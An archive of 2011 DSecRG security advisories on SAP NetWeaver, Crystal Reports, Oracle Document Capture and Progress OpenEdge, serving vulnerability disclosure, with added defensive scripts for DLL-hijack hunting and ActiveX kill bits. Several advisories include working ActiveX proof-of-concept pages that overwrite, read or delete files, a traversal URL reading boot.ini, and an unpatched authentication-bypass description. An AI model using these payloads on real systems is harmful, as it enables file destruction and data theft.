Date of Public Advisory:09.03.2011
CVE-number: 
Author:  Dmitriy Evdokimov from Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)


Description
***
SAP NetWeaver Integration Directory has the following linked XSS vulnerabilities:

1. XSS in error_msg.jsp
2. XSS in ViewCaches.jsp
3. Stored XSS in ViewLogger.jsp
4. POST and Stored XSS in ShowMemLog

Details
***
1. Vulnerable script: error_msg.jsp
Vulnerable parameters: id


2. Vulnerable script: ViewCaches.jsp
Vulnerable parameters: refresh
3. Vulnerable script: ViewLogger.jsp
Vulnerable parameters: logger
4. Vulnerable servlet: ShowMemLog
Vulnerable parameters: thread, class (stored xss), invert, filter

Example:
**
A working exploit will be available in the commercial ERPSCAN security scanner for SAP (ERPSCAN.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=313
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1512776


Fix Information
*
The solution to this issue is given in SAP security note 1512776.

About
*
Digital Security:
Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, and certification for the ISO/IEC 27001:2005, PCI DSS and PA DSS standards.

Digital Security Research Group:
DSecRG is the international subdivision of Digital Security focused on research and software development for securing business-critical systems such as enterprise applications (ERP, CRM, SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed the new product ERPSCAN security suite for SAP and the ERPSCAN Online service, which help customers perform automated security assessments and compliance checks for SAP solutions.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com







[DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS

2011-03-16 Thread Alexandr Polyakov

[DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS 

SAP NetWeaver Integration Directory has multiple linked XSS vulnerabilities. 

Digital Security Research Group [DSecRG] Advisory DSecRG-11-012 (Internal DSecRG-00159)

Application: SAP NetWeaver XI
Versions Affected:   SAP NetWeaver XI
Vendor URL:  http://www.sap.com
Bugs:XSS
Exploits:YES
Reported:09.06.2010
Vendor response: 10.06.2010
Date of Public Advisory:09.03.2011
CVE-number: 
Author:  Dmitriy Evdokimov from Digital Security Research Group [DSecRG] 
(research [at] dsecrg [dot] com)

Description
***
SAP NetWeaver Integration Directory has multiple linked XSS vulnerabilities.

Details
***
1. Vulnerable servlet: CheckService 
Vulnerable parameters: fileNameL, directoryNameL
2. Vulnerable servlet: ExportabilityCheck
Vulnerable parameters: fileNameL, directoryNameL
3. Vulnerable servlet: ViewCaches
Vulnerable parameters: XiDynPage_ThreadId
4. Vulnerable servlet: ShowMemLog
Vulnerable parameters: thread

Example:
**
A working exploit will be available in the commercial ERPSCAN security scanner for SAP (ERPSCAN.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=312
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1512776


Fix Information
*
The solution to this issue is given in SAP security note 1512776.









[DSECRG-11-014] SAP GUI (sapgui) - DLL hijacking

2011-03-16 Thread Alexandr Polyakov

[DSECRG-11-014] SAP GUI (sapgui) - DLL hijacking 

SAP Front End applications (SAPGui.exe) are vulnerable to DLL hijacking attacks. This makes remote code execution possible.

Digital Security Research Group [DSecRG] Advisory DSecRG-11-014 (Internal 
DSecRG-00183)

Application: SAP GUI
Versions Affected:   6.4 - 7.2
Vendor URL:  http://www.sap.com
Bugs:DLL hijacking
Exploits:YES
Reported:24.08.2010
Vendor response: 26.08.2010
Date of Public Advisory:09.03.2011
CVE-number: 
Author:  Alexey Sintsov, Alexandr Polyakov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***
SAP Front End applications (SAPGui.exe) are vulnerable to DLL hijacking attacks. This makes remote code execution possible.

Details
***
An attacker can place SAP GUI shortcuts (.sap) on a share directory he controls and, in the same directory, DLLs containing malicious code. The DLL name will be MFC80RUS.DLL (for Russian systems) or MFC80LOC.DLL for SAPGui.exe. The attacker then sends the victim a link to the shortcut. When the victim tries to open the shortcut, the SAP application tries to load its DLLs from the working directory, which is the attacker's share directory, so the attacker's DLLs are loaded on the victim's machine and the malicious code in these libraries is executed. This happens because SAPGui.exe and BExAnalyzer.exe search the working directory before the system directories.
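A hunting script for the footprint described above, added here as an example that is not part of the advisory: it walks a file share and reports every directory in which a SAP GUI shortcut (*.sap) sits next to one or more DLLs, since that directory becomes SAPGui.exe's working directory when the shortcut is opened. The two DLL names come from the advisory; the share layout the script builds is constructed sample data.

```python
from __future__ import annotations
import os
import tempfile
from pathlib import Path

# DLL names the advisory says SAPGui.exe resolves from its working directory.
TARGETED_DLLS = {"mfc80rus.dll", "mfc80loc.dll"}


def find_shortcut_dll_colocation(root: Path) -> list[dict]:
    """Walk a share and report each directory holding a SAP GUI shortcut (*.sap)
    next to one or more DLLs. Every DLL in such a directory is a hijack
    candidate; the names from the advisory raise the finding to high severity."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        names = {n.lower() for n in filenames}          # NTFS names are case-insensitive
        shortcuts = sorted(n for n in names if n.endswith(".sap"))
        dlls = sorted(n for n in names if n.endswith(".dll"))
        if shortcuts and dlls:
            findings.append({
                "directory": str(Path(dirpath).relative_to(root)),
                "shortcuts": shortcuts,
                "dlls": dlls,
                "severity": "high" if set(dlls) & TARGETED_DLLS else "medium",
            })
    return findings


def build_sample_share(base: Path) -> None:
    """Constructed share layout for the example (not real data): a benign folder,
    a folder pairing a shortcut with the Russian MFC DLL from the advisory, a
    folder pairing a shortcut with an unrelated DLL, and a lone shortcut."""
    (base / "docs").mkdir()
    (base / "docs" / "readme.txt").write_text("nothing to see")
    (base / "login").mkdir()
    (base / "login" / "prod.sap").write_text("[System]\nName=PRD\n")  # assumed shortcut body
    (base / "login" / "MFC80RUS.DLL").write_bytes(b"MZ")               # stand-in, not a real DLL
    (base / "tools").mkdir()
    (base / "tools" / "test.sap").write_text("")
    (base / "tools" / "helper.dll").write_bytes(b"MZ")
    (base / "lone").mkdir()
    (base / "lone" / "lone.sap").write_text("")


def scan_sample_share() -> list[dict]:
    """Build the sample share in a temporary directory, scan it, and return the
    findings sorted by directory so the result is deterministic."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        build_sample_share(base)
        return sorted(find_shortcut_dll_colocation(base), key=lambda f: f["directory"])


if __name__ == "__main__":
    for f in scan_sample_share():
        print(f"[{f['severity']}] {f['directory']}: {f['shortcuts']} next to {f['dlls']}")
```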


References
**
http://dsecrg.com/pages/vul/show.php?id=314
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1511179

Fix Information
*
The solution to this issue is given in SAP security note 1511179.











[DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS

2011-03-16 Thread Alexandr Polyakov
[DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS 

SAP Crystal Report Server 2008 - multiple cross-site scripting vulnerabilities. 

SAP Crystal Report Server 2008 - Multiple cross-site scripting vulnerabilities. 
[DSecRG-11-011] (Internal DSECRG-00147) 


Multiple XSS vulnerabilities were found in the PerformanceManagement module of SAP Crystal Report Server 2008. An attacker can intercept the cookie of an administrator or a regular user of the system.

Application: SAP Crystal Report Server 2008 
Versions Affected: SAP Crystal Report Server 2008 
Vendor URL:  http://www.sap.com 
Bugs: Linked XSS Vulnerability 
Exploits:YES 
Reported: 06.08.2010 
Vendor response: 07.08.2010
Date of Public Advisory: 09.03.2011
Authors: Dmitriy Chastuhin 
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) 

Details 
*** 
Using the discovered vulnerabilities, an attacker can intercept the cookie and perform any administrative actions in the system on the user's behalf.

1. Cross-site scripting vulnerability found in script aa-add-analytic2.jsp
   Vulnerable GET parameter: backURL
2. Cross-site scripting vulnerability found in script aa-add-validate.jsp
   Vulnerable GET parameter: pagePos
3. Cross-site scripting vulnerability found in script aa-analytic-frameset.jsp.jsp
   Vulnerable GET parameter: entry
4. Cross-site scripting vulnerability found in script aa-cacheparams.jsp
   Vulnerable GET parameters: MetaDataCachePeriod, AppBuilderCachePeriod, SessionCachePeriod, RefreshDashboardPeriod
5. Cross-site scripting vulnerability found in script aa-display-flash.jsp
   Vulnerable GET parameter: swf
6. Cross-site scripting vulnerability found in script aa-dmgraph.jsp
   Vulnerable GET parameter: Sel
7. Cross-site scripting vulnerability found in script aa-edit-goal.jsp
   Vulnerable GET parameter: defTar
8. Cross-site scripting vulnerability found in script aa-map-frameset.jsp
   Vulnerable GET parameter: analyticToken
9. Cross-site scripting vulnerability found in script aa-open-inlist.jsp
   Vulnerable GET parameters: url, sWindow, BEGIN_DATE, END_DATE, CURRENT_DATE, CURRENT_SLICE
10. Cross-site scripting vulnerability found in script aa-overviewctxt.jsp
   Vulnerable GET parameters: DocName, Label


Example:
**
A working exploit will be available in the commercial ERPSCAN security scanner for SAP (ERPSCAN.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=311
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1509610


Fix Information
*
The solution to this issue is given in SAP security note 1509610.







[DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS

2011-03-14 Thread Alexandr Polyakov
[DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS

SAP NetWeaver 7.0 application XI SOAP Adapter has linked XSS vulnerability 

Digital Security Research Group [DSecRG] Advisory DSecRG-11-009 (Internal 
DSecRG-00120)

Application: SAP NetWeaver 
Versions Affected:   SAP NetWeaver XI SOAP Adapter 3.0-7.11
Vendor URL:  http://www.sap.com
Bugs:XSS
Exploits:YES
Reported:25.01.2010
Vendor response: 25.01.2010 
Date of Public Advisory:09.03.2011
CVE-number: 
Author:  Dmitriy Evdokimov from Digital Security Research Group [DSecRG] 
(research [at] dsecrg [dot] com)

Description
***
The SAP NetWeaver 7.0 application XI SOAP Adapter (com.sap.aii.af.soapadapter) has a linked XSS vulnerability.

Details
***
Vulnerable script: HelperServlet
Vulnerable parameters: action

Example:
**
A working exploit will be available in the commercial ERPSCAN security scanner for SAP (ERPSCAN.com).

References
**

http://dsecrg.com/pages/vul/show.php?id=309
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1438191

Fix Information
*
The solution to this issue is given in SAP security note 1438191.











[DSECRG-11-010] SAP NetWeaver logon.html - XSS

2011-03-14 Thread Alexandr Polyakov

[DSECRG-11-010] SAP NetWeaver logon.html - XSS 

SAP NetWeaver BSP logon page has linked XSS vulnerability. 

Digital Security Research Group [DSecRG] Advisory DSecRG-11-010 (Internal 
DSecRG-00127)
Application: SAP NetWeaver 
Versions Affected:   SAP NetWeaver SAP_BASIS 620-730 
Vendor URL:  http://www.sap.com
Bugs:XSS
Exploits:YES
Reported:05.02.2010
Vendor response: 06.02.2010
Date of Public Advisory:09.03.2011
CVE-number: 
Author:  Alexey Sintsov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***
SAP NetWeaver BSP logon page has linked XSS vulnerability.

Details
***
Another vulnerability was found, similar to the ones described in notes 887168 and 887164, but in a different parameter.
Vulnerable variable: logonUrl
Vulnerable page: /sap/bc/public/bsp/sap/system_public/logon.htm

An attacker can send a link to an administrator and obtain his cookie.

Example:
**
A working exploit will be available in the commercial ERPSCAN security scanner for SAP (ERPSCAN.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=310
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1450270

Fix Information
*
The solution to this issue is given in SAP security note 1450270.









[DSECRG-00153] Oracle Document Capture Actbar2.ocx - insecure method

2011-01-25 Thread Alexandr Polyakov
ActiveX components contain insecure methods.

Digital Security Research Group [DSecRG] Advisory #DSECRG-00153



Application:Oracle Document Capture
Versions Affected:  Release 10gR3
Vendor URL: www.oracle.com
Bugs:   insecure method, File overwriting
Exploits:   YES
Reported:   22.03.2010
Vendor response:31.03.2010
Date of Public Advisory:24.01.2011
CVE-number: CVE-2010-3591
Author: Evdokimov Dmitriy from Digital Security Research Group 
[DSecRG] (research [at] dsecrg [dot] com)



Description
***

Oracle Document Capture contains ActiveX components that contain insecure methods.

Insecure method in Actbar2.ocx


Details
***

Oracle Document Capture contains the ActiveX component ActiveBar2Library (Actbar2.ocx), Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}, which contains the insecure method SaveLayoutChanges that can overwrite any non-hidden file on the system.

Class ActiveBar2
GUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}
Number of Interfaces: 1
Default Interface: IActiveBar2
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False



Exploit
***

An attacker can construct an HTML page that calls the vulnerable function SaveLayoutChanges of the ActiveX component Actbar2.ocx.

Example:

<HTML>
 <HEAD>
 <TITLE>DSecRG</TITLE>
 </HEAD>
 <BODY>

 <OBJECT id='eds'
 classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT>

 <SCRIPT>

 function Exploit(){
 eds.SaveLayoutChanges("C:\\31337.txt",1);
 }
 Exploit();

 </SCRIPT>
</BODY>
</HTML>



References
**

http://dsecrg.com/pages/vul/show.php?id=304
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html




Fix Information
*

The information was published in the Oracle Critical Patch Update (CPU) of January 2011.
All customers can download the CPU patches following the instructions at:

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html










[DSECRG-11-006] Oracle Document Capture ActiveX - Insecure method, buffer overflow

2011-01-25 Thread Alexandr Polyakov
ActiveX components contain insecure methods.

Digital Security Research Group [DSecRG] Advisory DSECRG-11-006 (internal 
#DSECRG-09-066) 


Application:Oracle Document Capture 
Versions Affected:  Oracle Document Capture 10.1.3.5
Vendor URL: http://oracle.com
Bugs:   Insecure method. Buffer overflow.
Exploits:   YES
Reported:   14.12.2009
Vendor response:15.12.2009
Date of Public Advisory:24.01.2011
CVE:CVE-2010-3599
Author: Alexandr Polyakov from DSecRG 

Description
***

An insecure method was found in the NCSECWLib ActiveX control, which is part of Oracle Document Capture.
One of its methods (WriteJPG) can be used to overwrite files on the user's system and is also affected by a buffer overflow.




Details
***

An attacker can construct an HTML page that calls the vulnerable function WriteJPG of the ActiveX object NCSECWLib.

Example 1 (file overwrite)
*** 


<html>
<script>
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
prototype  = "Sub WriteJPG ( ByVal OutputFile As String ,  ByVal Quality As Long ,  ByVal bWriteWorldFile As Boolean )"
memberName = "WriteJPG"
progid     = "NCSECWLib.NCSRenderer"
argCount   = 3

arg1="c:\boot.ini"
arg2=1
arg3=True

target.WriteJPG arg1 ,arg2 ,arg3

</script>
</html>


Example 2
***

<html>
<script>
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
prototype  = "Sub WriteJPG ( ByVal OutputFile As String ,  ByVal Quality As Long ,  ByVal bWriteWorldFile As Boolean )"
memberName = "WriteJPG"
progid     = "NCSECWLib.NCSRenderer"
argCount   = 3

arg1=String(13332, "A")
arg2=1
arg3=True

target.WriteJPG arg1 ,arg2 ,arg3 

</script></job></package>


References
**

http://dsecrg.com/pages/vul/show.php?id=306
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html




Fix Information
*

Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from: 

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html


About
*

Digital Security: 

Is one of the leading IT security companies in CEMEA, providing information 
security consulting, audit and penetration testing services, ERP and SAP 
security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA 
DSS standards.

Digital Security Research Group:

International subdivision of Digital Security company focused on research and 
software development for securing business-critical systems like: enterprise 
applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking 
software. DSecRG developed new product ERPSCAN security suite for SAP 
NetWeaver and service ERPSCAN Online which can help customers to perform 
automated security assessments and compliance checks for SAP solutions.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com






[DSECRG-11-007] Oracle Document Capture ImportBodyText - read files

2011-01-25 Thread Alexandr Polyakov

Digital Security Research Group [DSecRG] Advisory DSECRG-11-007 (Internal 
#DSECRG-00117)


Application:Oracle Document Capture  
Versions Affected:  10.1350.0005
Vendor URL: 
http://www.oracle.com/technology/software/products/content-management/index_dc.html
Bugs:   Insecure READ method
Exploits:   YES
Reported:   29.01.2010 
Second report:  02.02.2010
Date of Public Advisory:24.01.2010  
CVE:CVE-2010-3595
Authors:Alexey Sintsov
by Digital Security Research Group [DSecRG] 
(research [at] dsecrg [dot] com)



Description
***

The EasyMail ActiveX Control (emsmtp.dll) included in the Oracle Document 
Capture distribution can be used to read any file on the target system. The 
vulnerable method is ImportBodyText().



Details
***

For example, if the filename C:\\boot.ini is passed to the ImportBodyText 
method, the control opens and reads the file C:\boot.ini. The content of 
boot.ini is then loaded into the BodyText property.


Class EasyMailSMTPObj
GUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9}
Number of Interfaces: 1
Default Interface: IEasyMailSMTPObj
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False



Example:
***

<HTML>
<HEAD>
<TITLE>DSECRG</TITLE>
</HEAD>
<BODY>

<OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT>

<SCRIPT>

function Exploit(){
ora.ImportBodyText("C:\\boot.ini"); 
document.write("Try to read c:\\boot.ini:<br><br>"+ora.BodyText);
}
Exploit();

</SCRIPT>
</BODY>
</HTML>



References
**

http://dsecrg.com/pages/vul/show.php?id=307
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html




Fix Information
*

Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from: 

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html











[DSECRG-00143] SAP Crystal Reports 2008 - ActiveX insecure methods

2011-01-25 Thread Alexandr Polyakov
 [DSECRG-11-002] (Internal DSECRG-00143) SAP Crystal Report Server 2008 
scriptinghelpers.dll ActiveX component - Insecure methods

The component contains insecure methods that allow overwriting any file in 
the OS, running an executable file, killing a process, and deleting a file.

Application:SAP Crystal Report Server 2008
Versions Affected:  SAP Crystal Report Server 2008
Vendor URL: http://sap.com
Bugs:   insecure methods
Exploits:   YES
Reported:   09.03.2010
Vendor response:10.03.2010
Date of SAPNOTE Published: 8.10.2010
Date of Public Advisory:  14.01.2011
Authors:Dmitry Chastuhin
Digital Security Research Group [DSecRG] (research [at] 
dsecrg [dot] com)

Description

SAP Crystal Report Server 2008 contains a variety of features with which users 
can manage and share interactive reports and dashboards, as well as provide 
access to them via the Internet.

Details
**
Insecure methods were found in the library scriptinghelpers.dll. An attacker 
could construct an HTML page containing calls to the insecure functions.

1. Insecure method CreateTextFile. Allows creating files and overwriting 
existing ones.
Sample
**


2. Insecure method LaunchProgram. Allows running an executable file.



3. Insecure method DeleteFile. Allows deleting any file in the OS.



4. Insecure method Kill. Allows terminating any process whose PID is known.


References
**

http://dsecrg.com/pages/vul/show.php?id=302
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1458309




Fix Information
*

Solution to this issue is given in the 1458309 security note.








[DSECRG-11-005] Oracle Document Capture empop3.dll - insecure method

2011-01-25 Thread Alexandr Polyakov

ActiveX components contain insecure methods.

Digital Security Research Group [DSecRG] Advisory DSECRG-11-005 (internal 
#DSECRG-00154) 


Application:Oracle Document Capture
Versions Affected:  Release 10gR3
Vendor URL: www.oracle.com
Bugs:   insecure method, File overwriting, File deleting
Exploits:   YES
Reported:   22.03.2010
Vendor response:31.03.2010
Date of Public Advisory:24.01.2011
CVE-number: CVE-2010-3591
Author: Evdokimov Dmitriy from Digital Security Research Group 
[DSecRG] (research [at] dsecrg [dot] com)



Description
***

Oracle Document Capture contains ActiveX components with insecure methods in 
empop3.dll.


Details
***


Oracle Document Capture contains the ActiveX component EMPOP3Lib (empop3.dll), 
Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24},

which contains the insecure method DownloadSingleMessageToFile that can delete 
any file in the system.

Class EasyMailPop3
GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}
Number of Interfaces: 1
Default Interface: IPOP3Main
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
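Defensive counterpart to the "KillBitSet: False" lines in this class dump and in the EasyMailSMTPObj dump of DSECRG-11-007 above: an added PowerShell script, not part of the DSecRG advisories, that reports whether the ActiveX kill bit is set for the CLSIDs quoted on this page and applies it when run with -Set. It assumes the standard Microsoft kill-bit registry location (the 0x400 bit of "Compatibility Flags" under the ActiveX Compatibility key) and resolves the NCSECWLib.NCSRenderer CLSID, which the page does not give, from its ProgID.

```powershell
# Added example, not part of the DSecRG advisories: report (and with -Set, apply)
# the ActiveX kill bit for the controls named on this page. The kill bit is the
# 0x400 bit of the "Compatibility Flags" DWORD under the ActiveX Compatibility
# key (Microsoft KB 240797); the Wow6432Node path covers 32-bit IE on x64.
param([switch]$Set)

$KillBit = 0x400
$Bases = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

# CLSIDs quoted in the advisories above; the NCSRenderer CLSID is not given on
# the page, so it is resolved from its ProgID at run time (assumption: the
# ProgID is registered under HKCR on the machine being checked).
$Targets = @{
    'EasyMailSMTPObj (emsmtp.dll)' = '{68AC0D5F-0424-11D5-822F-00C04F6BA8D9}'
    'EasyMailPop3 (empop3.dll)'    = '{F647CBE5-3C01-402A-B3F0-502A77054A24}'
}

function Resolve-ProgId {
    # Look up the CLSID registered for a ProgID; $null if the control is absent.
    param([string]$ProgId)
    $key = "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID"
    if (-not (Test-Path $key)) { return $null }
    return (Get-ItemProperty -Path $key).'(default)'
}

function Get-CompatFlags {
    # Current "Compatibility Flags" value for a CLSID key, 0 if missing.
    param([string]$Key)
    if (-not (Test-Path $Key)) { return 0 }
    $flags = (Get-ItemProperty -Path $Key -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return 0 }
    return [int]$flags
}

function Test-KillBit {
    # True only if the kill bit is present in every hive view that exists here.
    param([string]$Clsid)
    foreach ($base in $Bases) {
        if (-not (Test-Path (Split-Path $base -Parent))) { continue }   # no Wow6432Node on x86
        if (((Get-CompatFlags (Join-Path $base $Clsid)) -band $KillBit) -eq 0) { return $false }
    }
    return $true
}

function Set-KillBit {
    # OR the kill bit into "Compatibility Flags", creating the key if needed.
    param([string]$Clsid)
    foreach ($base in $Bases) {
        if (-not (Test-Path (Split-Path $base -Parent))) { continue }
        $key = Join-Path $base $Clsid
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $flags = (Get-CompatFlags $key) -bor $KillBit
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $flags -Type DWord
    }
}

$ncs = Resolve-ProgId 'NCSECWLib.NCSRenderer'
if ($ncs) { $Targets['NCSRenderer (NCSEcw.dll)'] = $ncs }

foreach ($name in $Targets.Keys) {
    $clsid = $Targets[$name]
    $state = if (Test-KillBit $clsid) { 'kill bit SET' } else { 'kill bit NOT set' }
    Write-Output ("{0,-32} {1}  {2}" -f $name, $clsid, $state)
    if ($Set -and -not (Test-KillBit $clsid)) {
        Set-KillBit $clsid          # requires an elevated (administrator) shell
        Write-Output ("{0,-32} {1}  kill bit applied" -f $name, $clsid)
    }
}
```

Setting the kill bit blocks instantiation of the control from Internet Explorer only; it does not remove the DLL, so vendor patches from the referenced CPU remain the actual fix.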



Details
***

An attacker can construct an HTML page that calls the vulnerable function 
DownloadSingleMessageToFile from the ActiveX component empop3.dll.

Example:

<HTML>
 <HEAD>
 <TITLE>DSecRG</TITLE>
 </HEAD>
 <BODY>
 
 <OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT>
 
 <SCRIPT>
 
 function Exploit(){
 eds.DownloadSingleMessageToFile(1,"C:\\boot.ini",1);   
 }
 Exploit();
 
 </SCRIPT>
</BODY>
</HTML>


References
**

http://dsecrg.com/pages/vul/show.php?id=305
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html




Fix Information
*

Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from: 

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html









[DSECRG-00145] SAP Crystal Reports 2008 - Directory Traversal

2011-01-25 Thread Alexandr Polyakov
DSECRG-11-003 (Internal DSECRG-00145) SAP Crystal Report Server 2008 - 
Directory Traversal 
A directory traversal vulnerability was discovered in the PerformanceManagement 
module of SAP Crystal Report Server 2008, which allows reading any file on the 
OS.

Application:SAP Crystal Report Server 2008
Versions Affected:   SAP Crystal Report Server 2008
Vendor URL: http://sap.com
Bugs:   Directory Traversal File Read
Exploits:YES
Reported:   29.03.2010
Vendor response:30.03.2010
Date of SAPNOTE Published:8.10.2010
Date of Public Advisory:14.01.2011
Authors:Dmitriy Chastuhin
Digital Security Research Group [DSecRG] (research [at] 
dsecrg [dot]com)

Description

SAP Crystal Report Server 2008 contains a variety of features with which users 
can manage and share interactive reports and dashboards, as well as provide 
access to them via the Internet.

Details
***
A directory traversal vulnerability was found in the script qa.jsp. With this 
vulnerability, an authenticated attacker can read any file on the server.

Sample
**
http://sap_server_adr:8080/PerformanceManagement/jsp/qa.jsp?func=browse&root=wi&path=../../../../../../boot.ini

References
**

http://dsecrg.com/pages/vul/show.php?id=303
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1476930




Fix Information
*

Solution to this issue is given in the 1476930 security note.










[DSECRG-11-008] Open Edge RDBMS - Multiple architecture vulnerabilities (UNPATCHED)

2011-01-25 Thread Alexandr Polyakov
Digital Security Research Group [DSecRG] Advisory   #DSECRG-11-008

Application:Progress OpenEdge Enterprise RDBMS
Versions Affected:  10.2A and maybe others
Vendor URL: http://web.progress.com
Bug:    Authentication bypass, UserID enumeration
Exploits:   YES
Reported:   13.10.2009
Vendor response:13.10.2009
Solution:   NONE
Date of Public Advisory:24.01.2011
Authors:Alexander Polyakov, Alexey Sintsov, Alexey Troshichev 
of Digital Security Research Group [DSecRG]



Description
***

Progress OpenEdge Enterprise RDBMS (formerly known as the Progress RDBMS) is
a high-efficiency relational database management system produced by Progress
Software Corp. It is widely used as a backend for customized ERP systems.
This RDBMS has vulnerabilities that make it possible to enumerate UserIDs and 
bypass authentication.

Details
***


1. UserID enumeration

An attacker can obtain valid UserIDs. This is possible because the OpenEdge 
RDBMS server gives different answers when the password is incorrect and when 
the UserID does not exist. The client application shows the same message in 
both cases - "Your Password and UserID USERID do not match". But at the 
network layer the answers from the server are different:

Packet 1. From server to client, if the UserID exists (UserID eq AAA):

0x   00 00 00 00 00 01 00 00-00 00 00 02 08 00 45 00   ..E.
0x0010   00 C3 00 00 00 00 40 06-7C 33 7F 00 00 01 7F 00   .A@.|3....
0x0020   00 01 0B B8 10 42 56 07-00 00 00 00 00 00 50 00   ...?.BV...P.
0x0030   40 00 00 00 00 00 00 00-00 07 00 2D 00 9B 00 4F   @..-.›.O
0x0040   00 18 00 01 00 00 00 00-00 00 00 00 00 00 00 00   
0x0050   00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   
0x0060   00 00 00 02 00 00 00 01-00 00 7F 68 00 4F FF FB   ..h.Oyu
0x0070   00 00 00 00 00 00 0F 02-00 00 00 00 00 00 00 00   
0x0080   22 C0 E7 00 02 00 3C 01-FB 03 41 41 41 10 72 6D   Acu.AAA.rm
0x0090   57 78 6A 69 64 4E 63 6E-4D 64 6D 69 61 63 03 41   WxjidNcnMdmiac.A
0x00A0   41 41 FA 00 09 FD FD FD-FD FD FD FD FD FF FA 00   AAu..yu.
0x00B0   09 FD FD FD FD FD FD FD-FD FF FD FD FD FD FD FD   .yyy
0x00C0   FD FD FD FD FD FD FD FD-FD FD FD FD FD FD FD FD   
0x00D0   FDy


Packet 2. From server to client, if the UserID does not exist:

0x   00 00 00 00 00 01 00 00-00 00 00 02 08 00 45 00   ..E.
0x0010   00 74 00 00 00 00 40 06-7C 82 7F 00 00 01 7F 00   .t@.|‚....
0x0020   00 01 0B B8 10 45 56 07-00 00 00 00 00 00 50 00   ...?.EV...P.
0x0030   40 00 00 00 00 00 00 00-00 07 00 2D 00 4C FB 41   @..-.LuA
0x0040   00 18 00 01 00 00 00 00-00 00 00 00 00 00 00 00   
0x0050   00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   
0x0060   00 00 00 02 00 00 00 01-00 00 7F 68 00 00 FF FB   ..h..yu

So an attacker can connect to the RDBMS server with different UserIDs and 
inspect the network answers to find existing UserIDs.

2. Authentication bypass

A remote attacker can log in to the RDBMS with an existing or non-existing 
UserID without a password. This is possible because the authentication process 
takes place on the client side. When the password is incorrect, the client 
application resets the connection to the server and shows a message box. If 
the password is correct, the client sends to the server the UserID which it 
will use in the RDBMS. 

Packet 3. From client to server, when password for UserID TEST2 is correct:

0x   00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00   ..E.
